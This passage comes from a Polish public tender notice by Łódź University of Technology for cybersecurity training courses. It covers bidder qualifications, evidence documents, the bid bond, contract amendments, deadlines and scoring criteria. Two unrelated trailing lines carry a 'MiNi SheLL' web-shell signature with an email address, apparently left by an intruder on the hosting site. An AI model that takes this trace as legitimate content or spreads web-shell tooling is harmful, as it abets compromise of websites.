edukacyjne (szkolenie, warsztaty, seminaria itp.) przeprowadzone stacjonarnie lub zdalnie, podczas którego zapewniono co najmniej: trenerów, materiały szkoleniowe oraz ewaluację szkoleń.<br/> <br/>Za kurs informatyczny z zakresu cyberbezpieczeństwa Zamawiający uzna usługę polegającą na przeprowadzeniu kursu <br/>z zakresu podstaw cyberbezpieczeństwa, lub bezpieczeństwa <br/>w chmurze lub sieci.<br/> <br/>*Przez usługę Zamawiający rozumie jedną umowę/zamówienie/zlecenie.<br/>**Okresy wyrażone w latach lub miesiącach, o których mowa powyżej, liczy się wstecz od dnia, w którym upływa termin składania ofert w postępowaniu.<br/><br/>4.2 dysponuje lub będzie dysponował co najmniej jedną osobą, która zostanie skierowana do realizacji niniejszego zamówienia, która to osoba:<br/>a)	posiada co najmniej wykształcenie wyższe magisterskie oraz<br/>b)	przeprowadziła w okresie ostatnich 3** (trzech) lat przed upływem terminu składania ofert, przynajmniej 2 (dwa) kursy informatyczne z zakresu cyberbezpieczeństwa dla co najmniej 60 osób.<br/><br/>Zamawiający rozumie przez kurs co najmniej dwudniowe wydarzenie edukacyjne (szkolenie, warsztaty, seminaria itp.) przeprowadzone stacjonarnie lub zdalnie, podczas którego zapewniono co najmniej: trenerów, materiały szkoleniowe oraz ewaluację szkoleń.<br/> <br/>Za kurs informatyczny z zakresu cyberbezpieczeństwa Zamawiający uzna usługę polegającą na przeprowadzeniu kursu <br/>z zakresu podstaw cyberbezpieczeństwa, lub bezpieczeństwa <br/>w chmurze lub sieci.<br/> <br/>**Okresy wyrażone w latach lub miesiącach, o których mowa powyżej, liczy się wstecz od dnia, w którym upływa termin składania ofert w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający zgodnie z dyspozycją art. 274 ust. 1 ustawy Pzp wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych na potwierdzenie spełnienia warunków udziału w postępowaniu, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień ich złożenia <br/>w postaci:<br/>1) wykazu usług stanowiącego załącznik nr 6 do SWZ wraz <br/>z załączeniem dowodów określających czy usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot (np. protokół wykonania usługi), na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.<br/>UWAGA:<br/>- W przypadku zamówień/kontraktów obejmujących większy zakres usług niż wymagany przez Zamawiającego, należy wyodrębnić rzeczowo i wykazać zakres usług zgodnych z zakresem określonym w Rozdziale VIII ust. 2 pkt 4) ppkt. 4.1 SWZ;<br/>- W przypadku złożenia oświadczenia własnego Wykonawca jest zobligowany podać w nim uzasadnienie braku możliwości uzyskania dowodów potwierdzających należyte wykonanie usług ujętych w wykazie;<br/>- Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami, wówczas w powyższym wykazie dostaw zobowiązany jest podać jedynie te usługi, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>2) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia, odpowiedzialnych za świadczenie usług, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, stanowiącego załącznik nr 7 do SWZ. <br/>2. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych <br/>i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, dane umożliwiające dostęp do tych środków.<br/>3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość <br/>i aktualność.<br/>4. W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę <br/>w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający, w celu potwierdzenia zgodności oferowanych usług z kryteriami określonymi w opisie kryteriów oceny ofert żąda złożenia przez Wykonawcę wraz z ofertą przedmiotowych środków dowodowych tj.:<br/>a)	informacji o ilości przeprowadzonych szkoleń, w ramach kryterium: „Doświadczenie osoby wyznaczonej do wykonania usługi w realizacji usług szkoleniowych dla uczelni wyższych lub instytucji badawczych”, zgodnie z rozdziałem XX ust. 3 SWZ. Przedmiotową informację Wykonawca wskaże w Formularzu ofertowym, wg wzoru stanowiącego Załącznik nr 1 do SWZ, poprzez wypełnienie odpowiedniego w nim punktu tj. oświadczenia zawartego w punkcie 3.<br/>b)	informacji o dostępie do platformy umożliwiającej uczestnikom kursu udział w rzeczywistych symulacjach ataków hakerskich, <br/>w ramach kryterium: „Praktyczny program nauczania zapewniony poprzez dostęp do platformy umożliwiającej uczestnikom kursu udział w rzeczywistych symulacjach ataków hakerskich”, zgodnie <br/>z rozdziałem XX ust. 4 SWZ. Przedmiotową informację Wykonawca wskaże w Formularzu ofertowym, wg wzoru stanowiącego Załącznik nr 1 do SWZ, poprzez wypełnienie odpowiedniego punktu tj. oświadczenia zawartego w punkcie 4.<br/>2.	Zgodnie z art. 107 ust. 1 ustawy Pzp Zamawiający wymaga złożenia przedmiotowych środków dowodowych wraz z ofertą.<br/>3.	Zgodnie z przepisem art. 107 ust. 3 ustawy Pzp, jeżeli wykonawca nie złoży wraz z ofertą przedmiotowego środka dowodowego, o którym mowa w ust. 1 lub złożony przedmiotowy środek dowodowy będzie niekompletny, Zamawiający nie będzie wzywał do jego złożenia lub uzupełnienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. W niniejszym postępowaniu Wykonawca zobowiązany jest do wniesienia wadium w wysokości 7 500,00 zł (słownie: siedem tysięcy pięćset złotych, 00/100).<br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2022 r.poz. 2080, 2185.).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Politechniki Łódzkiej:<br/>PEKAO S.A. II O/ ŁÓDŹ 25 1240 3028 1111 0000 2822 2228 <br/>z zaznaczeniem „Wadium – Usługi przeprowadzenia kursów informatycznych z zakresu cyberbezpieczeństwa w ramach projektu „Centrum Rozwoju Kompetencji Politechniki Łódzkiej” nr sprawy – CRK/383.8/2023/1/8.<br/>Wadium wnoszone w formie innej niż pieniądz należy przekazać wraz z Ofertą w oryginale w postaci elektronicznej. Wykonawca składa wadium załączając na Platformie w zakładce „OFERTY” – poprzez wybranie polecenia „dodaj dokument&#34;. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. <br/>4. Wadium należy wnieść przed upływem terminu składania ofert. Za wadium wniesione w terminie uważa się:<br/>1)	dla wadium wnoszonego w formach innych niż pieniądz – data przesłania dokumentu na Platformę. <br/>2)	dla wadium wnoszonego w pieniądzu – datę uznania rachunku bankowego przez bank Zamawiającego przed upływem terminu składania ofert. Z uwagi na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.<br/>5. Dokument wadialny, o którym mowa w pkt 4. SWZ, powinien zawierać informacje o udzieleniu gwarancji lub poręczenia na odpowiednią kwotę wymienioną w pkt 1, winien określać precyzyjnie gwaranta (poręczyciela), beneficjenta (Politechnika Łódzka), zleceniodawcę gwarancji (poręczenia), termin ważności udzielonej gwarancji (poręczenia), który winien odpowiadać co najmniej terminowi związania ofertą – pkt XVII.1. SWZ oraz zawierać zobowiązanie podmiotu udzielającego gwarancji (poręczenia) do bezwarunkowej, nieodwołalnej zapłaty wadium na pierwsze pisemne żądanie Zamawiającego w przypadkach przewidzianych w ustawie Pzp. Treść dokumentu stanowiącego wadium nie może warunkować wypłacenia kwoty Zamawiającemu od badania zasadności żądania wypłaty przez wystawcę dokumentu czy jakikolwiek inny podmiot.<br/>6. Treść dokumentu stanowiącego wadium nie może warunkować wypłacenia kwoty Zamawiającemu od badania zasadności żądania wypłaty przez wystawcę dokumentu czy jakikolwiek inny podmiot.<br/>7.	W przypadku Wykonawców ubiegających się wspólnie <br/>o udzielenie zamówienia, dopuszczalne jest wystawienie dokumentu stanowiącego wadium na jednego z Wykonawców, pod warunkiem, że z jego treści wynika, iż zabezpiecza on złożenie oferty przez wszystkich Wykonawców działających wspólnie, lub że dokument wadialny został wystawiony na podmiot prawidłowo umocowany do reprezentowania wszystkich Wykonawców działających wspólnie. <br/>8. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania ofert.<br/>9. Okoliczności zwrotu wadium określa ustawa Pzp.<br/>Z uwagi na ograniczoną ilość znaków pozostałe warunki dotyczące wadium zawarte są w Rozdziale XVI SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z rozdziałem VII SWZ.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust 4 ustawy Pzp, z którego wynika, które usługi wykonają poszczególni wykonawcy – zgodnie z wzorem stanowiącym Załącznik nr 8 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy<br/>w sprawie zamówienia publicznego na warunkach określonych we Wzorze umowy, stanowiącym Załącznik nr 4 do SWZ.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w zakresie uregulowanym w art. 455 ustawy Pzp oraz wskazanym we Wzorze umowy, stanowiącym Załącznik nr 4 do SWZ.<br/>3. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej w postaci aneksu.<br/>Treść § 8 ww. wzoru umowy:<br/>1. Zamawiający zastrzega możliwość wprowadzenia istotnych zmian postanowień zawartej umowy. W szczególności postanowienia umowy mogą ulec zmianie w następującym zakresie oraz na następujących warunkach: <br/>1)	zmiana treści umowy w sytuacji dostosowania treści umowy do aktualnego stanu prawnego, <br/>2)	zmiana treści umowy, gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy,<br/>3)	zmiana terminu realizacji przedmiotu umowy, w przypadku wystąpienia po stronie Zamawiającego sytuacji uniemożliwiających realizację zamówienia w terminach określonych w umowie,<br/>4)	zmiana terminu (przedłużenia) wykonania przedmiotu umowy na skutek wystąpienia okoliczności niezależnych i niezawinionych przez Zamawiającego,<br/>5)	zmiana terminu (przedłużenia) wykonania przedmiotu umowy, odpowiednio do wymaganych terminów realizacji projektu,<br/>6)	zmiana terminu przeprowadzenia danego szkolenia, jeżeli Wykonawca nie jest w stanie realizować danego szkolenia w wyznaczonym terminie z powodu niemożności spełnienia warunków realizacji umowy, których nie dało się przewidzieć, pomimo dołożenia należytej staranności, np. z powodu wystąpienia zdarzeń losowych (usprawiedliwiona nieobecność trenera, niska frekwencja, siła wyższa, stan epidemiczny etc.), <br/>7)	zmiana terminów przeprowadzenia szkolenia w terminach określonych w harmonogramie,<br/>8)	nastąpiła zmiana danych Wykonawcy, np. zmiana adresu.<br/>2.	Wszelkie zmiany umowy mogą nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takich zmian. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy dostępnej pod adresem: https://plodz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-03 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamówienie jest umieszczone pod pozycją 1.3.7 planu postępowań z dnia 20 stycznia 2023 r. nr 2023/BZP 00047250/01/P.<br/>2. 1.	Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>3. Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5, jeżeli udowodni Zamawiającemu, że spełnił łącznie przesłanki wskazane w art. 110 ust. 2 ustawy Pzp. <br/>4. Zamawiający nie przewiduje wykluczenia na podstawie art. 109 ust. 1 ustawy Pzp.<br/>5.	Zamawiający oceni, czy podjęte przez wykonawcę czynności, o których mowa w art. 110 ust. 2 ustawy Pzp, są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykonawcy. Jeżeli podjęte przez wykonawcę czynności nie są wystarczające do wykazania jego rzetelności, zamawiający wyklucza wykonawcę.<br/>6. Zasady oceny ofert w kryterium „Cena ofertowa” (C) – waga 60%.<br/>W tym kryterium Wykonawca może otrzymać maksymalnie 60 punktów.<br/>Sposób obliczania liczby punktów w kryterium cena ofertowa:<br/>Cena ofertowa = Cn/Cbn x 100 x C<br/> gdzie :<br/> Cn – najniższa cena ofertowa <br/> Cbn – cena oferty badanej<br/> C – waga procentowa dla kryterium „cena ofertowa” (60%).<br/>7. Zasady oceny ofert w kryterium „Doświadczenie osoby wyznaczonej do wykonania usługi w realizacji usług szkoleniowych dla uczelni wyższych lub instytucji badawczych” (D) – waga 20%.<br/>W tym kryterium Wykonawca może otrzymać maksymalnie 20 punktów. <br/>1)	Zamawiający dokona oceny tego kryterium na podstawie złożonej przez Wykonawcę wraz z ofertą informacji na temat przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert, szkoleń lub warsztatów lub wykładów lub kursów dla uczelni wyższych lub instytucji badawczych, przez osobę wskazaną do realizacji, z zakresu wymaganego przez przedmiot zamówienia;<br/>2)	w przypadku niezłożenia przez Wykonawcę informacji w przedmiotowym zakresie, informacja ta nie podlega uzupełnieniu, co skutkuje nieprzyznaniem punktów w ramach tego kryterium, punkty zostaną przyznane w następujący sposób:<br/>1)	żadnej usługi dla uczelni wyższych lub instytucji badawczych – 0 pkt;<br/>2)	1 usługa dla uczelni wyższych lub instytucji badawczych – 10 pkt;<br/>3)	2 usługi dla uczelni wyższych lub instytucji badawczych – 20 pkt.<br/>8.	Punktacja w kryterium „Praktyczny program nauczania zapewniony poprzez dostęp do platformy umożliwiającej uczestnikom kursu udział w rzeczywistych symulacjach ataków hakerskich” (P) – 20%. W tym kryterium Wykonawca może otrzymać maksymalnie 20 punktów. <br/>1)	Zamawiający dokona oceny tego kryterium na podstawie złożonej przez Wykonawcę wraz z ofertą informacji na temat dostępu do platformy umożliwiającej uczestnikom kursu udział w rzeczywistych symulacjach ataków hakerskich;<br/>2)	w przypadku niezłożenia przez Wykonawcę informacji w przedmiotowym zakresie, informacja ta nie podlega uzupełnieniu, co skutkuje nieprzyznaniem punktów w ramach tego kryterium, punkty zostaną przyznane w następujący sposób:<br/>1)	wykonawca nie dysponuje dostępem do platformy umożliwiającej uczestnikom kursu udział <br/>w rzeczywistych symulacjach ataków hakerskich – 0 pkt;<br/>2)	wykonawca dysponuje dostępem do platformy umożliwiającej uczestnikom kursu udział <br/>w rzeczywistych symulacjach ataków hakerskich – 10 pkt;<br/>3)	wykonawca dysponuje dostępem do platformy umożliwiającej uczestnikom kursu udział <br/>w rzeczywistych symulacjach ataków hakerskich i rozwiązań ćwiczonych w trakcie kursów – 20 pkt.<br/>Z uwagi na ograniczoną liczbę znaków, pozostałe szczegółowe informacje znajdują się w Rozdziale XX SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com